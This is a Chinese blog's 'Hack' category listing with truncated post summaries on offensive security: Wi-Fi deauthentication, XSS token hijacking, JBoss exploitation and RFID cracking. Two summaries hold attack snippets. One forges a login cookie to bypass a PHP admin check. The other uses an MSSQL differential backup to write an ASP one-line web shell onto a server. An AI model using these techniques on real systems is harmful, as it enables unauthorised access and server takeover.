随笔分类 - Hack
摘要://2011-11-11 星期五 //php 程序员的思维: // login.php ---代码片段 if($adminuser==$user and $adminpass==$pass) { setcookie("login","yes",time()+3600); header("location:admin.php"); } //我们的思维: javascript:alert(document.cookie="login="+escape("yes")) ################
阅读全文
摘要:// http://hi.baidu.com/micropoor// 2011-11-10// Coder <?php echo '<p>Micropoor.</p>'; ?> //有效 <? echo '<p>Micropoor.</p>'; ?> //有效 // Hacker<script language = 'php'> echo '<p>Micropoor.</p>' ; </script> //有效
阅读全文
摘要:// http://hi.baidu.com/micropoor// 2011-11-09 // Coderecho "This is The $Micropoor"."s"; //有效 echo "This is The ".$Micropoor."s"; //有效// Hacker$Micropoor = 'Bug'; echo "This is The $Micropoors";// 无效;字母s会被当成有效的变量名组成元素,但是这里的变量是$Micropoor echo
阅读全文
摘要:可以用来把用户下线,强制重连,从而获得握手包......我是这么想的...熄灯后试试。http://files.cnblogs.com/noevil/Mdk3.pdf
阅读全文
摘要:Fuzzing Frameworkshttp://files.cnblogs.com/noevil/FuzzingFrameworks.pdf用Python Fuzzing的,收藏。
阅读全文
摘要:还是exploit-db上的paperToken Hijacking with XSShttp://files.cnblogs.com/noevil/TokenHijackingWithXSS.pdf
阅读全文
摘要:比war那个好利用点,至少不用费尽的打包了。http://files.cnblogs.com/noevil/JBossExploitation.pdf
阅读全文
摘要:顶80SEC的牛。转载开始。深掘XSS漏洞场景之XSS Rootkit[完整修订版]EMail: rayh4c#80sec.comSite: http://www.80sec.comDate: 2011-10-150×00 前言众所周知XSS漏洞的风险定义一直比较模糊,XSS漏洞属于高危漏洞还是低风险漏洞一直以来都有所争议。XSS漏洞类型主要分为持久型和非持久型两种:1. 非持久型XSS漏洞一般存在于URL参数中,需要访问黑客构造好的特定URL才能触发漏洞。2. 持久型XSS漏洞一般存在于富文本等交互功能,如发帖留言等,黑客使用的XSS内容经正常功能进入数据库持久保存。3. DOM
阅读全文
摘要:http://www.backtrack-linux.org/wiki/index.php/RFID_Cooking_with_Mifare_Classic
阅读全文
该文被密码保护。
摘要:Here's to the crazy ones. The misfits. The rebels. The troublemakers. The round pegs in the square holes. The ones who see things differently. They're not fond of rules. And they have no respect for the status quo. You can quote them, disagree with them, glorify or vilify them. About the onl
阅读全文
摘要:[ 转载开始... ]1.完整备份一次(保存位置当然可以改)backup database 库名 to disk = 'c:\ddd.bak';--2.创建表并插曲入数据create table [dbo].[dtest] ([cmd] [image]);insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--3.进行差异备份backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORM
阅读全文
摘要:<?php error_reporting(0); date_default_timezone_set('Asia/Shanghai'); // SETTING$password = ''; // PASSWORD OF DOUBLE MD5$smtpserver = 'smtp.mail.yahoo.com.cn'; // SMTP SERVICE$smtpserverport = 25; // SMTP PORT$smtpusermail = 'noevilsparrow@yahoo.cn'; // SMTP USER$
阅读全文
浙公网安备 33010602011771号